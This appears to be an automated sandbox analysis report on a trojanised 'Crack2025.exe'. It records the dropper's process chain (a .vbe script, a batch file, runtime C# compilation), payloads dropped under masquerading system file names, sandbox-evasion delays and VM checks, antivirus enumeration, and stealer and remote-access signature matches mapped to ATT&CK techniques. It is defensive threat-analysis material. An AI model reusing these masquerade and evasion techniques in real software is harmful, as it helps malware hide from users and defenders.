                          Source: C:\Users\Public\Pictures\Registry.exe Memory allocated: 2C10000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exe Memory allocated: 1ADC0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exe Memory allocated: 14A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Pictures\Registry.exe Memory allocated: 1AFE0000 memory reserve | memory write watch
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Code function: 35_2_00007FF7C7AE5FDC sldt word ptr [eax]
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 600000
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599872
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599743
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599640
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599523
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599390
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 599239
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 597546
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 597425
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 597296
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeWindow / User API: threadDelayed 2429Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZgWXldfI.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\AtYLDxzH.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\kMRvrGzk.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\tvkLaiES.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\SFAQXTUW.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\KbrbnaEo.logJump to dropped file
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\biIGHMkD.logJump to dropped file
                          Source: C:\Users\user\Desktop\Crack2025.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23796
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599872s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599743s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599640s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599523s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599390s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -599239s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99862s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99459s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99213s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -99094s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98969s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98859s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98750s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98638s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -98515s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597546s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597425s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 2788Thread sleep time: -597296s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 9192Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 8408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe TID: 8780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe TID: 3148Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe TID: 1388Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Pictures\Registry.exe TID: 1136Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Pictures\Registry.exe TID: 8348Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B4A69B
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B5C220
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6B348 FindFirstFileExA,0_2_00B6B348
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5E6A3 VirtualQuery,GetSystemInfo,0_2_00B5E6A3
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599872Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599743Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599523Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599390Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 599239Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99862Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99459Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99213Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 99094Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98969Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98859Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98750Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98638Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 98515Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597546Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597425Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 597296Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Pictures\Registry.exeThread delayed: delay time: 922337203685477
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: wscript.exe, 00000001.00000002.1402310908.0000000002D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`yp5
                          Source: wscript.exe, 00000001.00000002.1402310908.0000000002D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1492800411.000000001BC3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ROCESS_INFORC
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1492581357.000000001BC33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\u
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1493029847.000000001BC4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\Crack2025.exeAPI call chain: ExitProcess graph end nodegraph_0-23987
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B5F838
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B67DEE mov eax, dword ptr fs:[00000030h]0_2_00B67DEE
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B6C030 GetProcessHeap,0_2_00B6C030
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: Debug
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Pictures\Registry.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Pictures\Registry.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B5F838
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F9D5 SetUnhandledExceptionFilter,0_2_00B5F9D5
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B5FBCA
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B68EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B68EBD
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Crtsvc\ComComponentRuntimeMonitor.exe "C:\Crtsvc/ComComponentRuntimeMonitor.exe"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"Jump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP"Jump to behavior
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5F654 cpuid 0_2_00B5F654
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00B5AF0F
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformationJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeQueries volume information: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe VolumeInformationJump to behavior
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeQueries volume information: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe VolumeInformation
                          Source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exeQueries volume information: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe VolumeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformation
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeQueries volume information: C:\Crtsvc\ComComponentRuntimeMonitor.exe VolumeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeQueries volume information: C:\Users\Public\Pictures\Registry.exe VolumeInformation
                          Source: C:\Users\Public\Pictures\Registry.exeQueries volume information: C:\Users\Public\Pictures\Registry.exe VolumeInformation
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B5DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exeCode function: 0_2_00B4B146 GetVersionExW,0_2_00B4B146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668, type: MEMORYSTR
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED

                          Remote Access Functionality

                          Source: Yara matchFile source: 00000009.00000002.1485618171.00000000127BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComComponentRuntimeMonitor.exe PID: 8388, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: xP1x1VNeIAPjWsHHYbBFNFY.exe PID: 8668, type: MEMORYSTR
                          Source: Yara matchFile source: 9.0.ComComponentRuntimeMonitor.exe.2d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000000.1401692601.00000000002D2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1264146143.00000000073E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\ComComponentRuntimeMonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\smartscreen.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Desktop\ShellExperienceHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Pictures\Registry.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe, type: DROPPED
                          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                          | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                          | Gather Victim Identity Information | 11 Scripting | Valid Accounts | 231 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                          | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                          | Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | Security Account Manager | 147 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
                          | Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 3 Software Packing | NTDS | 341 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 251 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                          | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
[Behavior graph (image not reproduced): Behavior Graph ID: 1639972, Sample: Crack2025.exe, Startdate: 16/03/2025, Architecture: WINDOWS, Score: 100. Process chain shown: Crack2025.exe -> wscript.exe -> cmd.exe -> ComComponentRuntimeMonitor.exe -> csc.exe, schtasks.exe and 16 other processes.]

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.